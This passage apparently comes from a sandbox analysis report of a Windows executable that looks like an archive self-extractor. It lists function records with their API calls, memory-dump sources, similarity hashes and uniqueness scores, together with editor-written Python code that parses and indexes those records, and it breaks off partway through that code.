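# Constructed sample: two function records copied (abridged) from the report
# above in its own layout, table indentation removed. A real run would read
# the saved report text instead.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0032F7F5,0032F758,0032F9F9), ref: 0032F791
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0032F7A7
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0032F7BC
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• Opcode ID: 3c2f908b5ec4f75b6c61bfa7a870bd0776b119fbbfe2a353c2a03c4548d654d4
Uniqueness
Uniqueness Score: -1.00%
APIs
• __aulldiv.LIBCMT ref: 0032254E
  • Part of subcall function 0031C619: GetVersionExW.KERNEL32(?), ref: 0031C63E
• FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00322571
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00322594
• __aullrem.LIBCMT ref: 00322699
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• Opcode ID: f8aa1ce86612094b8e856c2c1535526eb17da9763e9361534f40f37340d9c7d4
Uniqueness
Uniqueness Score: -1.00%
"""

# One API entry: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then "ref: <call-site address>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# Any "Key: value" line, bulleted ("• Opcode ID: ...") or not ("Uniqueness Score: ...").
FIELD_RE = re.compile(r"^•?\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str                        # call-site address inside the dumped image
    parent: Optional[str] = None    # set for "Part of subcall function" entries


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def api_names(self, include_subcalls=False):
        return [a.name for a in self.apis if include_subcalls or a.parent is None]

    @property
    def opcode_id(self):
        return self.fields.get("Opcode ID")

    @property
    def strings(self):
        # The report joins referenced strings with '$'; an empty field means none.
        value = self.fields.get("String ID", "")
        return value.split("$") if value else []


def parse_records(text):
    """Split report text into FunctionRecords; each 'APIs' heading starts a record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["value"]
    return records


def resolved_imports(records):
    """Opcode ID -> export names resolved at run time via GetProcAddress (its second
    argument as the sandbox logged it; '?' means the value was not recovered)."""
    out = {}
    for rec in records:
        names = [a.args[1] for a in rec.apis
                 if a.name == "GetProcAddress" and len(a.args) > 1 and a.args[1] != "?"]
        if names:
            out[rec.opcode_id] = names
    return out


def index_by_opcode_id(records):
    """Index by Opcode ID so the same function can be looked up across reports."""
    return {r.opcode_id: r for r in records if r.opcode_id}


def uniqueness(rec):
    value = rec.fields.get("Uniqueness Score", "")
    return float(value.rstrip("%")) if value else None


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.opcode_id[:16], rec.api_names(), rec.strings, uniqueness(rec))
    print(resolved_imports(parse_records(SAMPLE)))
```

To use it on a full report, save the page text and call parse_records on it; every record in this section reports a Uniqueness Score of -1.00%, so that field does not separate the records here, and the Opcode ID or Instruction Fuzzy Hash is the better key for pivoting.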

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0032F7F5,0032F758,0032F9F9), ref: 0032F791
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0032F7A7
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0032F7BC
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: 3c2f908b5ec4f75b6c61bfa7a870bd0776b119fbbfe2a353c2a03c4548d654d4
• Instruction ID: 65e92018c1e99a4606e2dbe08b10389be60645109b395c878157e16ed04e6dcc
• Opcode Fuzzy Hash: 3c2f908b5ec4f75b6c61bfa7a870bd0776b119fbbfe2a353c2a03c4548d654d4
• Instruction Fuzzy Hash: 2CF0C2353012325F9B334E6C6C866A662FC9A027D9723043AEA1AD7100E710DC8156D1
Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 003227F1
  • Part of subcall function 0031C619: GetVersionExW.KERNEL32(?), ref: 0031C63E
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00322815
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0032282F
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00322842
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00322852
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00322862
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 4fad3a32ac9a2312b73cb34d4a819e6bd666882465d7156e4a841e19f484fdc5
• Instruction ID: 29df15f24e2c86e059f15fc4ccce1d34f44f9eb55ec09007756031a8efef76e6
• Opcode Fuzzy Hash: 4fad3a32ac9a2312b73cb34d4a819e6bd666882465d7156e4a841e19f484fdc5
• Instruction Fuzzy Hash: B8313879108355ABC704DFA9D88499BB7ECBF98704F004A2EF995C3210E730E548CBA6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,00333C81,00333A3C,00330BF4), ref: 00333C98
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00333CA6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00333CBF
• SetLastError.KERNEL32(00000000,00333C81,00333A3C,00330BF4), ref: 00333D11
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 396d47163d5d1b3a56598c6b50979e3890bb3ed746d98807a567a02f9ff4668e
• Instruction ID: 9bb6666014228074b731a8940c2fdb078808db4f103bab7843a806e1e2e46024
• Opcode Fuzzy Hash: 396d47163d5d1b3a56598c6b50979e3890bb3ed746d98807a567a02f9ff4668e
• Instruction Fuzzy Hash: 8E01F7372183225EA71B27757CC5A6B2F5CEB05775F724239F6206A0F1EF166D105680
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00353070,00335982,00353070,?,?,00335281,00000050,?,00353070,00000200), ref: 0033A519
• _free.LIBCMT ref: 0033A54C
• _free.LIBCMT ref: 0033A574
• SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A581
• SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A58D
• _abort.LIBCMT ref: 0033A593
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 65f893f4d10d1f2bf7ab604f46e845af6e9b817f84ce915f7f8c87f5b6d5823a
• Instruction ID: 0cc4337bff02b1dc404f70950f6f5ea0c93d51a58ba8eff3bd04472feae4b494
• Opcode Fuzzy Hash: 65f893f4d10d1f2bf7ab604f46e845af6e9b817f84ce915f7f8c87f5b6d5823a
• Instruction Fuzzy Hash: 1FF0C83A240E0067E21B33257CCBF6B166D9BD3762F250224FAD4AA1A2EF259D018556
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
  • Part of subcall function 0031CD5C: _wcsrchr.LIBVCRUNTIME ref: 0031CD73
• _wcslen.LIBCMT ref: 0031D5A4
• _wcslen.LIBCMT ref: 0031D5EC
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _wcslen$_wcsrchr
• String ID: .exe$.rar$.sfx
• API String ID: 3513545583-31770016
• Opcode ID: fbf829b73502c7293f14ab9012ec33f70efc26fea142fa3e79e315ac0f8c24f6
• Instruction ID: 272f62a0a36bb0c16881aaad48de18fb5d53c3ddd61118ccaae6c46e6ecf386e
• Opcode Fuzzy Hash: fbf829b73502c7293f14ab9012ec33f70efc26fea142fa3e79e315ac0f8c24f6
• Instruction Fuzzy Hash: 79415A22500360A5C73BAF34D852AFB73B9EF5B748B12460EF8869F081E7619DC1D391
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 0031CF56
• GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0031B505,?,?,00000800,?,?,0031B4CA,?), ref: 0031CFF4
• _wcslen.LIBCMT ref: 0031D06A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: _wcslen$CurrentDirectory
• String ID: UNC$\\?\
• API String ID: 3341907918-253988292
• Opcode ID: 887e50d4c07771daeac7f1776b13495207837634941fc114a9a35378b937965a
• Instruction ID: f6aede456e98b6367e56ae5c26670d169641a71df2934c5a1afe78dbbb84b7d6
• Opcode Fuzzy Hash: 887e50d4c07771daeac7f1776b13495207837634941fc114a9a35378b937965a
• Instruction Fuzzy Hash: C041D036440229BACF27AF60DC41EEA77A9AF4E350F114425FC54AB041E771EAD28BA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadBitmapW.USER32(00000065), ref: 0032C8DD
• GetObjectW.GDI32(00000000,00000018,?), ref: 0032C902
• DeleteObject.GDI32(00000000), ref: 0032C934
• DeleteObject.GDI32(00000000), ref: 0032C957
  • Part of subcall function 0032B6D2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0032C92D,00000066), ref: 0032B6E5
  • Part of subcall function 0032B6D2: SizeofResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B6FC
  • Part of subcall function 0032B6D2: LoadResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B713
  • Part of subcall function 0032B6D2: LockResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B722
  • Part of subcall function 0032B6D2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B73D
  • Part of subcall function 0032B6D2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B74E
  • Part of subcall function 0032B6D2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0032B7B7
  • Part of subcall function 0032B6D2: GlobalUnlock.KERNEL32(00000000), ref: 0032B7D6
  • Part of subcall function 0032B6D2: GlobalFree.KERNEL32(00000000), ref: 0032B7DD
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
• String ID: ]
• API String ID: 1428510222-3352871620
• Opcode ID: 079a815c1cb1febe28096a68f135826b7c58d7a4e7ef8fe83751559991155e03
• Instruction ID: 83ca0d1f2116a96e1851fe88f84701c8414fd02dc0d62261f9bae59e59e6a646
• Opcode Fuzzy Hash: 079a815c1cb1febe28096a68f135826b7c58d7a4e7ef8fe83751559991155e03
• Instruction Fuzzy Hash: B201D632540B2667DB132764AC05A7FBA7DAF81B91F150114F944BB292DF618C4586E0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
  • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
• EndDialog.USER32(?,00000001), ref: 0032E79B
• GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0032E7B1
• SetDlgItemTextW.USER32(?,00000066,?), ref: 0032E7C5
• SetDlgItemTextW.USER32(?,00000068), ref: 0032E7D4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: RENAMEDLG
• API String ID: 445417207-3299779563
• Opcode ID: 587553d6548445ff7f1af7ffb6c02d74a78097ca6bab0b0030148e7cebd232ef
• Instruction ID: 1a35971cc16e991ea84e492b112ebc519112b09e5c20b1f04d86033da42f756b
• Opcode Fuzzy Hash: 587553d6548445ff7f1af7ffb6c02d74a78097ca6bab0b0030148e7cebd232ef
• Instruction Fuzzy Hash: 750124332813217AE6374FBCAC4AFA73B5DFB4A702F000424F305A64D0C7A268498B65
Uniqueness

Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003391E6,00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002), ref: 00339255
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00339268
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,003391E6,00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002), ref: 0033928B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 18efee2383518a97f1c46218c3b167103efd0db2050dcf525e77361e820c4f9a
                                                                                              • Instruction ID: 149b8fea7aa198be681b4813537c138f5b4f95c452bf3fce3caf74e354f729f8
                                                                                              • Opcode Fuzzy Hash: 18efee2383518a97f1c46218c3b167103efd0db2050dcf525e77361e820c4f9a
                                                                                              • Instruction Fuzzy Hash: B5F04F34A04618BBDB169FA4DC49B9EBFF8EB45752F0101A9F905AA160CF71AE50CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0031F608: _swprintf.LIBCMT ref: 0031F62E
                                                                                                • Part of subcall function 0031F608: _strlen.LIBCMT ref: 0031F64F
                                                                                                • Part of subcall function 0031F608: SetDlgItemTextW.USER32(?,00350274,?), ref: 0031F6AF
                                                                                                • Part of subcall function 0031F608: GetWindowRect.USER32(?,?), ref: 0031F6E9
                                                                                                • Part of subcall function 0031F608: GetClientRect.USER32(?,?), ref: 0031F6F5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                              • SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0$p05$p05
                                                                                              • API String ID: 2622349952-3330538057
                                                                                              • Opcode ID: 497981a3c2365c14d15e58dee74a5dd519af8bda4d302e66443f4e2984be779b
                                                                                              • Instruction ID: 72807fac896e485023b9df8ac89817ef25eebc5478bbc3e298709859661a4e0a
                                                                                              • Opcode Fuzzy Hash: 497981a3c2365c14d15e58dee74a5dd519af8bda4d302e66443f4e2984be779b
                                                                                              • Instruction Fuzzy Hash: 10F04F38110748ABDF6F5F608C09BEA3B99BB09385F054924FE59558E5CBB4CAD4EA10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: b4c5dc6e3e69cc72deda5e095e63965f30da631d5248ec8d32659b2a5f716c29
                                                                                              • Instruction ID: 4532040b05291d55fbdf500fb4f70355af500459a139377a43470e87bd4cfd31
                                                                                              • Opcode Fuzzy Hash: b4c5dc6e3e69cc72deda5e095e63965f30da631d5248ec8d32659b2a5f716c29
                                                                                              • Instruction Fuzzy Hash: 0651F4726002029FDB2B8F15D8C1BBA77A8EF44310F15852DEC419B2A0E775EE90CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0033D0F9
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033D11C
                                                                                                • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0033D142
                                                                                              • _free.LIBCMT ref: 0033D155
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033D164
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: a2c54a5d4389f7174ac393031d4f63639239365ef9d839e410cf81bb81491f96
                                                                                              • Instruction ID: e804ace21ba8de9711858384227534bf95561e676ad2f449f5de5f492b904ee9
                                                                                              • Opcode Fuzzy Hash: a2c54a5d4389f7174ac393031d4f63639239365ef9d839e410cf81bb81491f96
                                                                                              • Instruction Fuzzy Hash: 5501D476A016107F232316B67CC9D7B6A6EEEC7BA0B150129FD08CA300EE649C01C2B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
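
The two records above that an analyst meets in almost every MSVC-built binary, the GetModuleHandleExW/GetProcAddress/FreeLibrary block that resolves CorExitProcess in mscoree.dll and this GetEnvironmentStringsW/WideCharToMultiByte block, are also the kind of entry worth pivoting on across reports. The Python below is an added example written for this page; it is not Joe Sandbox code and not output from the sample. It parses records in the layout shown here into structured objects, pulls out the two identifiers worth searching other reports for (the API String ID and the Opcode Fuzzy Hash), and flags records whose calls are MSVC C-runtime housekeeping. The embedded sample text is copied from the two records above with the argument lists shortened; the CRT classification is the editor's own heuristic and not a field of the report.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from the report above with their long argument
# lists shortened; the layout and every identifier are the report's own.
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003391E6), ref: 00339255
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00339268
• FreeLibrary.KERNEL32(00000000,?,?,?,003391E6), ref: 0033928B
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode Fuzzy Hash: 18efee2383518a97f1c46218c3b167103efd0db2050dcf525e77361e820c4f9a
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0033D0F9
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000), ref: 0033D11C
  • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?), ref: 0033A830
• _free.LIBCMT ref: 0033D155
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033D164
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode Fuzzy Hash: a2c54a5d4389f7174ac393031d4f63639239365ef9d839e410cf81bb81491f96
Uniqueness
Uniqueness Score: -1.00%
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
# API line shape: "• [Part of subcall function ADDR: ]Name.MODULE[(args)], ref: ADDR"
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
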